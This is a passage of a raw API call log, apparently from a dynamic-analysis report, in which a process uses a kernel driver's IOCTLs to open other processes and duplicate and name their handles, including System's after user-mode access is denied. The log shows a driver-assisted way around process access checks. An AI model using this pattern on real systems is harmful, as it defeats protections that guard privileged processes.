ObjectInformation=0xffffc0014aee46d0, ReturnLength=0x0) returned 0x0 [0256.685] ExFreePoolWithTag (P=0xffffc0014aee46d0, Tag=0x0) [0256.685] ObfDereferenceObject (Object=0xffffe00069a40a10) returned 0x7fff [0256.685] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e3f8) [0256.685] IoCompleteRequest () returned 0x0 [0256.685] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.685] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.685] PsAcquireProcessExitSynchronization () returned 0x0 [0256.685] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e400) [0256.685] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a40a10, HandleInformation=0x0) returned 0x0 [0256.685] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.685] PsReleaseProcessExitSynchronization () returned 0x2 [0256.685] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x4001f [0256.685] ObQueryNameString (in: Object=0xffffe00069a40a10, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.685] ObfDereferenceObject (Object=0xffffe00069a40a10) returned 0x7ffe [0256.685] IoCompleteRequest () returned 0x0 [0256.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x44c) returned 0x1a4 [0256.685] GetCurrentProcess () returned 0xffffffffffffffff [0256.685] DuplicateHandle (in: hSourceProcessHandle=0x1a4, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0256.685] CloseHandle (hObject=0x1a4) returned 1 [0256.685] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ed480, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2ed480*, lpBytesReturned=0x14d450*=0x1c, lpOverlapped=0x0) returned 1 [0256.686] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000b1b8e3d8 | out: Process=0xffffd000b1b8e3d8) returned 0x0 [0256.686] PsAcquireProcessExitSynchronization () returned 0x0 [0256.686] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e3f8 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e3f8) [0256.686] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e3e0, HandleInformation=0x0 | out: Object=0xffffd000b1b8e3e0*=0xffffc001488ac870, HandleInformation=0x0) returned 0x0 [0256.686] PsReleaseProcessExitSynchronization () returned 0x2 [0256.686] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x4001d [0256.686] ZwQueryObject (in: Handle=0x1d0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000b1b8e3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000b1b8e3d4) returned 0xc0000004 [0256.686] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xffffc0014aee46d0 [0256.686] ZwQueryObject (in: Handle=0x1d0, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014aee46d0, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xffffc0014aee46d0, ReturnLength=0x0) returned 0x0 [0256.686] ExFreePoolWithTag (P=0xffffc0014aee46d0, Tag=0x0) [0256.686] ObfDereferenceObject (Object=0xffffc001488ac870) returned 0x7fff [0256.686] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e3f8) [0256.686] IoCompleteRequest () returned 0x0 [0256.686] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.686] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.686] PsAcquireProcessExitSynchronization () returned 0x0 [0256.686] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000b1b8e400) [0256.686] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001488ac870, HandleInformation=0x0) returned 0x0 [0256.686] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.686] PsReleaseProcessExitSynchronization () returned 0x2 [0256.686] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x4001c [0256.686] ObQueryNameString (in: Object=0xffffc001488ac870, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.686] ObfDereferenceObject (Object=0xffffc001488ac870) returned 0x7ffe [0256.686] IoCompleteRequest () returned 0x0 [0256.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x140) returned 0x1a4 [0256.686] GetCurrentProcess () returned 0xffffffffffffffff [0256.686] DuplicateHandle (in: hSourceProcessHandle=0x1a4, hSourceHandle=0x68, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0256.686] CloseHandle (hObject=0x1a4) returned 1 [0256.686] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ed480, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2ed480*, lpBytesReturned=0x14d450*=0x22, lpOverlapped=0x0) returned 1 [0256.686] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e3d8 | out: Process=0xffffd000b1b8e3d8) returned 0x0 [0256.686] PsAcquireProcessExitSynchronization () returned 0x0 [0256.686] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e3f8 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e3f8) [0256.686] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e3e0, HandleInformation=0x0 | out: Object=0xffffd000b1b8e3e0*=0xffffe0006a27be20, HandleInformation=0x0) returned 0x0 [0256.686] PsReleaseProcessExitSynchronization () returned 0x2 [0256.686] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40036 [0256.686] ZwQueryObject (in: Handle=0x68, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000b1b8e3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000b1b8e3d4) returned 0xc0000004 [0256.686] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xffffc00147dcd860 [0256.686] ZwQueryObject (in: Handle=0x68, ObjectInformationClass=0x2, ObjectInformation=0xffffc00147dcd860, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xffffc00147dcd860, ReturnLength=0x0) returned 0x0 [0256.686] ExFreePoolWithTag (P=0xffffc00147dcd860, Tag=0x0) [0256.686] ObfDereferenceObject (Object=0xffffe0006a27be20) returned 0x7ffe [0256.686] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e3f8) [0256.686] IoCompleteRequest () returned 0x0 [0256.687] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.687] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.687] PsAcquireProcessExitSynchronization () returned 0x0 [0256.687] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0256.687] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a27be20, HandleInformation=0x0) returned 0x0 [0256.687] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.687] PsReleaseProcessExitSynchronization () returned 0x2 [0256.687] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40035 [0256.687] ObQueryNameString (in: Object=0xffffe0006a27be20, ObjectNameInfo=0xffffe000685c67c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000685c67c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.687] ObfDereferenceObject (Object=0xffffe0006a27be20) returned 0x7ffd [0256.687] IoCompleteRequest () returned 0x0 [0256.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x2d8) returned 0x1a4 [0256.687] GetCurrentProcess () returned 0xffffffffffffffff [0256.687] DuplicateHandle (in: hSourceProcessHandle=0x1a4, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0256.687] CloseHandle (hObject=0x1a4) returned 1 [0256.687] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.687] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.687] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.687] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.687] PsAcquireProcessExitSynchronization () returned 0x0 [0256.687] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0256.687] ObReferenceObjectByHandle (in: Handle=0x38c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e9c650, HandleInformation=0x0) returned 0x0 [0256.687] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.687] PsReleaseProcessExitSynchronization () returned 0x2 [0256.687] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380c1 [0256.687] ObQueryNameString (in: Object=0xffffe00067e9c650, ObjectNameInfo=0xffffe0006a5164c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5164c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.687] ObfDereferenceObject (Object=0xffffe00067e9c650) returned 0xfffb [0256.687] IoCompleteRequest () returned 0x0 [0256.687] CloseHandle (hObject=0x19c) returned 1 [0256.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x240) returned 0x19c [0256.687] GetCurrentProcess () returned 0xffffffffffffffff [0256.687] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x478, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a4) returned 1 [0256.687] CloseHandle (hObject=0x19c) returned 1 [0256.687] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.688] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.688] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x38, lpOverlapped=0x0) returned 1 [0256.688] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.688] PsAcquireProcessExitSynchronization () returned 0x0 [0256.688] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0256.688] ObReferenceObjectByHandle (in: Handle=0x478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693de2d0, HandleInformation=0x0) returned 0x0 [0256.688] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.688] PsReleaseProcessExitSynchronization () returned 0x2 [0256.688] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x781a4 [0256.688] ObQueryNameString (in: Object=0xffffe000693de2d0, ObjectNameInfo=0xffffe0006a43b7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a43b7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.688] ObfDereferenceObject (Object=0xffffe000693de2d0) returned 0x18000 [0256.688] IoCompleteRequest () returned 0x0 [0256.688] CloseHandle (hObject=0x1a4) returned 1 [0256.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x19c) returned 0x0 [0256.688] GetLastError () returned 0x5 [0256.688] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0256.688] ZwOpenProcess (in: ProcessHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0x19c, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a3f1300*=0x1a4) returned 0x0 [0256.688] IoCompleteRequest () returned 0x0 [0256.688] GetCurrentProcess () returned 0xffffffffffffffff [0256.688] DuplicateHandle (in: hSourceProcessHandle=0x1a4, hSourceHandle=0x8c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0256.688] CloseHandle (hObject=0x1a4) returned 1 [0256.688] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.688] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.688] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0256.688] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.688] PsAcquireProcessExitSynchronization () returned 0x0 [0256.688] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0256.688] ObReferenceObjectByHandle (in: Handle=0x8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00147915c60, HandleInformation=0x0) returned 0x0 [0256.688] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.688] PsReleaseProcessExitSynchronization () returned 0x2 [0256.688] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c2 [0256.688] ObQueryNameString (in: Object=0xffffc00147915c60, ObjectNameInfo=0xffffe0006a604704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a604704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.688] ObfDereferenceObject (Object=0xffffc00147915c60) returned 0x10000 [0256.688] IoCompleteRequest () returned 0x0 [0256.689] CloseHandle (hObject=0x19c) returned 1 [0256.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.689] GetLastError () returned 0x5 [0256.689] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0256.689] ZwOpenProcess (in: ProcessHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a3f1300*=0x19c) returned 0x0 [0256.689] IoCompleteRequest () returned 0x0 [0256.689] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0256.689] ZwOpenProcess (in: ProcessHandle=0xffffd000b1b8e420, DesiredAccess=0x40, ObjectAttributes=0xffffd000b1b8e438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000b1b8e420*=0xffffffff8000111c) returned 0x0 [0256.689] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff8000111c, SourceHandle=0xa5c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe0006a3f1300*=0x1a4) returned 0x0 [0256.689] ZwClose (Handle=0xffffffff8000111c) returned 0x0 [0256.689] IoCompleteRequest () returned 0x0 [0256.689] CloseHandle (hObject=0x19c) returned 1 [0256.689] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.689] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.689] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.689] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.689] PsAcquireProcessExitSynchronization () returned 0x0 [0256.689] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.689] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000690503d0, HandleInformation=0x0) returned 0x0 [0256.689] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.689] PsReleaseProcessExitSynchronization () returned 0x2 [0256.689] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2faaf [0256.689] ObQueryNameString (in: Object=0xffffe000690503d0, ObjectNameInfo=0xffffe000690237c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690237c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.689] ObfDereferenceObject (Object=0xffffe000690503d0) returned 0xffff [0256.689] IoCompleteRequest () returned 0x0 [0256.689] CloseHandle (hObject=0x1a4) returned 1 [0256.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.689] GetLastError () returned 0x5 [0256.689] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0256.689] ZwOpenProcess (in: ProcessHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a3f1300*=0x1a4) returned 0x0 [0256.689] IoCompleteRequest () returned 0x0 [0256.689] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0256.689] ZwOpenProcess (in: ProcessHandle=0xffffd000b1b8e420, DesiredAccess=0x40, ObjectAttributes=0xffffd000b1b8e438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000b1b8e420*=0xffffffff8000111c) returned 0x0 [0256.690] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff8000111c, SourceHandle=0xa54, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe0006a3f1300*=0x19c) returned 0x0 [0256.690] ZwClose (Handle=0xffffffff8000111c) returned 0x0 [0256.690] IoCompleteRequest () returned 0x0 [0256.690] CloseHandle (hObject=0x1a4) returned 1 [0256.690] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.690] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.690] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.690] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.690] PsAcquireProcessExitSynchronization () returned 0x0 [0256.690] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.690] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a73d3f0, HandleInformation=0x0) returned 0x0 [0256.690] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.690] PsReleaseProcessExitSynchronization () returned 0x2 [0256.690] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2faab [0256.690] ObQueryNameString (in: Object=0xffffe0006a73d3f0, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.690] ObfDereferenceObject (Object=0xffffe0006a73d3f0) returned 0xffff [0256.690] IoCompleteRequest () returned 0x0 [0256.690] CloseHandle (hObject=0x19c) returned 1 [0256.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.690] GetLastError () returned 0x5 [0256.690] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0256.690] ZwOpenProcess (in: ProcessHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: 